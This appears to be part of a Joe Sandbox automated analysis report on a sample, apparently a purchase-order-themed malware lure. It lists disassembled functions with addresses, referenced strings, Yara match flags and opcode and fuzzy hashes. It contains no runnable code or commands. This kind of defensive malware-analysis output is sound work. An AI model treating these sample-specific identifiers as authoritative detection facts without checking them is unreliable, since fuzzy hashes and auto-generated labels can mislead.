Function 00FFCD8A Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

AlternateCodePage, xrefs: 00FFCD9E

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: AlternateCodePage
API String ID: 0-3889302423
Opcode ID: 241e4dfa9826188692e1c49dc010cf6da871ec9259e487e1776b0c4947677139
Instruction ID: 4c47d1b06644819f9f181fa36f0f56818efe286dd1601c237c73dd6fb22b5827
Opcode Fuzzy Hash: 241e4dfa9826188692e1c49dc010cf6da871ec9259e487e1776b0c4947677139
Instruction Fuzzy Hash: 7041C275E00219EBDB25DB98CC81AFFBBF8EF84314F14426AF951A7250E6749A41CB90

Function 010341BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 01034220

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: 61522b38ee959a05785a6f430dc77dffeb646d98574039e53a045ef0df806627
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 3B516B71604711AFD321DF59C841A6BBBF8FF88710F00892EFA959B6A0E774E914CB91

Function 0108CB20 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

@, xrefs: 0108CB8A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f9bbd452e1dae6d4174e8521eb7ca603566017f65d7c696d0fdeb23e9496e25e
Instruction ID: 9e2bd204ed0ff90c4443984483391324d4beecfa5539bd3b9aee376c60ef82af
Opcode Fuzzy Hash: f9bbd452e1dae6d4174e8521eb7ca603566017f65d7c696d0fdeb23e9496e25e
Instruction Fuzzy Hash: DC41AFB19442199FEB21EF99C940AAEBBF8FF14B10F00402EEAC5DF254D7748841CB60

Function 010BADD6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 010BAE0F

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 070140bb65d6de5ab65a82c48f3c9c487c58c383f03dc3be1e5b3a5f33fa2955
Instruction ID: 909fab0e0593ce2a0ce12b2e19b44d7bdeeac7aad861b6634624b47239c86e88
Opcode Fuzzy Hash: 070140bb65d6de5ab65a82c48f3c9c487c58c383f03dc3be1e5b3a5f33fa2955
Instruction Fuzzy Hash: CD418376E0021AEBDF21DAD8C880BEEB7B9EF44750F154166EA51B7290E634DE44C7A0

Function 0107C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0107C3FF

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: e3d5a8be15572e458f1f88dc050ffc0eac6daf7858b764b81dfbdccad714cdf0
Instruction ID: d000acb8d366585a42c396e6e0d0781c1db20d9c99beb3135a1fab023ab92452
Opcode Fuzzy Hash: e3d5a8be15572e458f1f88dc050ffc0eac6daf7858b764b81dfbdccad714cdf0
Instruction Fuzzy Hash: D34169F1D0052EABEB21DA50CD80FDEB77CAB54714F0045E5EB48A7141DB319E888FA8

Function 0107C920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

TrustedInstaller, xrefs: 0107C93B

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: TrustedInstaller
API String ID: 0-565535830
Opcode ID: 15150aedd6ea8a25d7947142d9fea28cf361785162f2a9f2a9250135c53278e2
Instruction ID: af5bba918e49d16de80d357ea362ead0f621d06a2780e260f7eb96fe5f672678
Opcode Fuzzy Hash: 15150aedd6ea8a25d7947142d9fea28cf361785162f2a9f2a9250135c53278e2
Instruction Fuzzy Hash: 17319E32D4021ABBEB22EB98CD41FEEBBB8FB54714F000069BA40EB151D7749E41C790

Function 010966D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01096721

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: f4000c94f13ff09460fd1d10cc2ce1fde1772334299a483886e1d9eee5905297
Instruction ID: a98723397fdd86cfe8f45a35fc02022befc82bcb6a3ae05b06151c474be8bb02
Opcode Fuzzy Hash: f4000c94f13ff09460fd1d10cc2ce1fde1772334299a483886e1d9eee5905297
Instruction Fuzzy Hash: A631BA316006599AEF32DE68C864FEEF7E8BF45704F1440A8E9C09B282E777D905DB50

Function 010A0AE0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

@, xrefs: 010A0B63

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
Instruction ID: 3477e8d98c4f668ef4928bf2e8ebdb85d038a7877e631032620fe6d3f8448f7e
Opcode Fuzzy Hash: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
Instruction Fuzzy Hash: 3E317EB111834ABFD311DF54C845E9FBBE8EB94764F404A2EB6D497190E7B0E908CB92

Function 0107C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0107C722

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: d19826361711fe559a0fc330ad8f3b22bf43a8a46473de17ae913b9ed0bb7a6a
Instruction ID: 5cc890a50d4350a2c62a74fcfe48d73786d0fa664d1c842f460da359d3ad7f2a
Opcode Fuzzy Hash: d19826361711fe559a0fc330ad8f3b22bf43a8a46473de17ae913b9ed0bb7a6a
Instruction Fuzzy Hash: F731B476D00517AFEB16DA58CA45DAFFBB4FF80720F114169E941A7251DB319E00C7E4

Function 00C2467A Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

&CEP, xrefs: 00C2463B

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: &CEP
API String ID: 0-816117459
Opcode ID: 797c285c8c32857b61c65efa425b5193eca7ad007013a56ba58d4502525bbe45
Instruction ID: 956b1a0010c550ae9536b649e299fb51b60921c394db268827a917b9e5aeb7e5
Opcode Fuzzy Hash: 797c285c8c32857b61c65efa425b5193eca7ad007013a56ba58d4502525bbe45
Instruction Fuzzy Hash: B6315974C0531DAFCB84CFB998422AEBFB4FB05700F2041A9E929A6250E73007459F96

Function 01028BD1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01028C07

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
Instruction ID: 54c6fe8c129cb29d6ef912c43ed40bbfad9ef2a9526664cee1f5c9a0cb8a8885
Opcode Fuzzy Hash: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
Instruction Fuzzy Hash: 9421D07B501139BBEB319A998884F5F7BEDEF95690F158066F6849B110D730DD01CB90

Function 01080CEE Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 01080D77

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 8c7d2d43474f87506dcbe77fba5f6fd08e3cbcf7b8eab671abaa2843708d32a1
Instruction ID: 13e5e9961756e8ace6589c5d8eaa8c032470c68defa7160ce0fb976321110e22
Opcode Fuzzy Hash: 8c7d2d43474f87506dcbe77fba5f6fd08e3cbcf7b8eab671abaa2843708d32a1
Instruction Fuzzy Hash: 0B21B3B15083449FD320EF1A8845A9BFBE8FFD5B10F10491EBAE49B250DBB19505CB92

Function 010B6B77 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 010B6BA7

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: d78173fca53fcc6d38c1b78641188d60ec94db80471e17bac291a071ab053bf9
Instruction ID: 23f704751a12efd6a65a7bd4d62eb5635642ef206d799aff5bf2ea821223e634
Opcode Fuzzy Hash: d78173fca53fcc6d38c1b78641188d60ec94db80471e17bac291a071ab053bf9
Instruction Fuzzy Hash: BA1187B2D44308CBEB25DFA8C442BEDBBF0EB04714F20456ED5A5AB282E3710641CF00

Function 0103E810 Relevance: 1.0, Instructions: 985COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0282763cb398748ba4df0f38e37e62eaeb2f711706528127c4fb4c3c8df05e6a
Instruction ID: 56be2dca5b5a73767867b7e8662e850e378948d01569355f69195528d96e3745
Opcode Fuzzy Hash: 0282763cb398748ba4df0f38e37e62eaeb2f711706528127c4fb4c3c8df05e6a
Instruction Fuzzy Hash: 02821372F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45

Function 0104508C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5d3b13850d4b24ffc49460519714bfae116df4574b2a6469fc25be06824a72
Instruction ID: 27d3f7e6fab6bcccb6d56d5b889cb9d7ff76be019708644914bd5ea2fc105f72
Opcode Fuzzy Hash: 2a5d3b13850d4b24ffc49460519714bfae116df4574b2a6469fc25be06824a72
Instruction Fuzzy Hash: CB62A6B680474A9FCF25CF48D8D04AEFBB2BA55304B49C5ADC8DA67604D371BA54CBC1

Function 0105717A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62aa8f90fb28896230f1175b79382427fa46442abed30e7f80bfcf9915518366
Instruction ID: 9df51d743ab6f15fbbdc8478762d54d1045ba65f18d93988df42ae206cb80b8e
Opcode Fuzzy Hash: 62aa8f90fb28896230f1175b79382427fa46442abed30e7f80bfcf9915518366
Instruction Fuzzy Hash: 9042B371A006168FDB99CF5DC4805BEBBF2FF88314B54859DD992AB341DB34E842DBA0

Function 010559C0 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684

Function 0102B1E0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886831a67ff6fa48646141c6090cc1c29be717bca6781001f985f18086f4d57b
Instruction ID: 880c4e52911423421d0a66c023dab614754ff03a0e029d01477d53d72a5595ce
Opcode Fuzzy Hash: 886831a67ff6fa48646141c6090cc1c29be717bca6781001f985f18086f4d57b
Instruction Fuzzy Hash: 8232B0B5E00229DBDF24DFA8C884BEEBBB5FF54704F184069E985AB390D7359941CB90

Function 0104088E Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fa7460c3c2a3b178ac6611302791b9f32f27718eac7f343656b59b66ac33a30
Instruction ID: d699bd26806469af749281b0a2b858b1880f2516826c5735cd3fdd199a15fbc5
Opcode Fuzzy Hash: 0fa7460c3c2a3b178ac6611302791b9f32f27718eac7f343656b59b66ac33a30
Instruction Fuzzy Hash: E5425CB5900715DFDB61CF68C880BEAB7F5BF04314F1485AAEA89EB245D770A984CF60

Function 01012760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f0917a239c1fee4bb979457fcb53a3f8c90922f02410949cca23ddde162664
Instruction ID: a0ad0dcbfcc621c39f6464cedd0c9590df60b905b670320e1cd37b51cfb55b44
Opcode Fuzzy Hash: 80f0917a239c1fee4bb979457fcb53a3f8c90922f02410949cca23ddde162664
Instruction Fuzzy Hash: B9321130A007558FDB65CF69C8507BEBBFABF84704F24815DE8C69B685DB3AA801CB50

Function 010C124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12aef94fe8938ee083444699e76e10973d4566aa8fc170624eaed473e79ec827
Instruction ID: 738c88a0ece6fa19eb5597e7179460b25b57f3ea866a90c10ca7b7b1fe0a1e63
Opcode Fuzzy Hash: 12aef94fe8938ee083444699e76e10973d4566aa8fc170624eaed473e79ec827
Instruction Fuzzy Hash: EB228135A00216CFDB19CF58C490AAEB7F2BF88714B1885ADD995DB386DB34E941CF90

Function 01028CDF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764221386b2c6f01653c06cf7704ae828c452cd8bf7793da9e9135a25d3d040f
Instruction ID: 439936b45d5b1a54b98b60e58d4b3e4f66c12817bade41e42dacb0bbd151c3b9
Opcode Fuzzy Hash: 764221386b2c6f01653c06cf7704ae828c452cd8bf7793da9e9135a25d3d040f
Instruction Fuzzy Hash: 4F224E74E0022A9BDF55CF99C480ABEBBF6AF54310B15C09AE9C5AB241E774D942CB60

Function 00FD2245 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1f420c92717ba3ddcc4f2edeba00639a02ab03870df926bedc529ba947e680
Instruction ID: be13f0f5e18f02fecb7af372a47ac05070291490b85c32364b65ecb5d85a586b
Opcode Fuzzy Hash: af1f420c92717ba3ddcc4f2edeba00639a02ab03870df926bedc529ba947e680
Instruction Fuzzy Hash: 1C1235D780E7D21FF3134B74ACA5792BF664E23258F1E41DBE4E5CA283E1098659C352

Function 00EBD878 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
Instruction ID: fdad371ad4561444d7a2b01ae21e02c6490d0b16043739033392a17427d87eae
Opcode Fuzzy Hash: 7be5512ebe0c94fa1fe9852b55a6c2381f64f734db3ab88d82c739600b713784
Instruction Fuzzy Hash: 4BE1E572BA86404BC70CDE18DCC26B973D6E7CA309F59943DE4C7C7247EA29D5038949

Function 00C30533 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: ab58ffee84b6a72a8f5ceee46ae9c16cd60ccb667b7d2f1efb276cba10ffc003
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 2F026F73D547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90

Function 01024955 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
Instruction ID: c2fa936daa9488078e7df46ab0766bf94e7e6e6cd9de21efc63d40c6252ee69b
Opcode Fuzzy Hash: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
Instruction Fuzzy Hash: F6F17D71F0022A9BDB55CF99D980BEEBBF9AF48304F048169E995EB240E774EC41CB50

Function 010B2AC0 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac0729bf979bfd500747f36d5911b153ee88c5fa708e8e43967bb73e826ed41
Instruction ID: b7fe894e763c80c78cb7940d5d36469ac601344b92a024ff4f04163b0ea908f0
Opcode Fuzzy Hash: bac0729bf979bfd500747f36d5911b153ee88c5fa708e8e43967bb73e826ed41
Instruction Fuzzy Hash: 87E1F431A0428A9FDB25DFACC491BFEBBF1AF48310F14845ED4D6AB281D635B985CB50

Function 010984BB Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992c1b6e799c82e18ba253b512c3f3a8a0a02981af23b52259e45331458b4101
Instruction ID: 72ab8d9c590c927c20c3f21ef4f28b3d0eb514a3c5be393348cc21da0597f87b
Opcode Fuzzy Hash: 992c1b6e799c82e18ba253b512c3f3a8a0a02981af23b52259e45331458b4101
Instruction Fuzzy Hash: AED1F071A0060E8BDF15CF68C861AFEB7F1BF89304F18C16AD995A7341E739E9059B60

Function 00FF8347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
